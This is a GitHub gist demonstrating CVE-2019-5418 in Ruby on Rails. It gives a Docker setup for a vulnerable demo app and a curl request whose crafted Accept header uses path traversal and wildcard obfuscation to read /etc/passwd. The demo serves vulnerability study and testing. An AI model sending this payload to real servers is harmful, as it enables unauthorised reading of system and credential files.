Skip to content

Instantly share code, notes, and snippets.

@ajxchapman

ajxchapman/README.md

Last active April 17, 2020 00:09
Show Gist options
  • Save ajxchapman/6ed7bf599f29a62cdbab7b6e95eebed9 to your computer and use it in GitHub Desktop.
Save ajxchapman/6ed7bf599f29a62cdbab7b6e95eebed9 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2019-5418 Demo
Raw
README.md

CVE-2019-5418 Demo

Build Docker container: Dockerfile

FROM ruby:2.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
COPY Gemfile.lock /myapp/Gemfile.lock
RUN bundle install
COPY . /myapp

# Add a script to be executed every time the container starts.
COPY entrypoint.sh /usr/bin/
RUN chmod +x /usr/bin/entrypoint.sh
ENTRYPOINT ["entrypoint.sh"]
EXPOSE 3000

# Start the main process.
CMD ["rails", "server", "-b", "0.0.0.0"]

Setup docker container

docker build -t rails:CVE-2019-5418 .
docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash
git clone https://github.com/mpgn/CVE-2019-5418.git
cd CVE-2019-5418/demo/
sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile
bundle install
bundle update
bundle exec rails s -p 3000 -b '0.0.0.0'

To demonstrate vulnerability

curl -i -s -k  -X $'GET' \
    -H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \
    $'http://127.0.0.1:3000/chybeta'

Sources

Copy link

ghost commented Apr 5, 2019

How is this bypass technology works?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment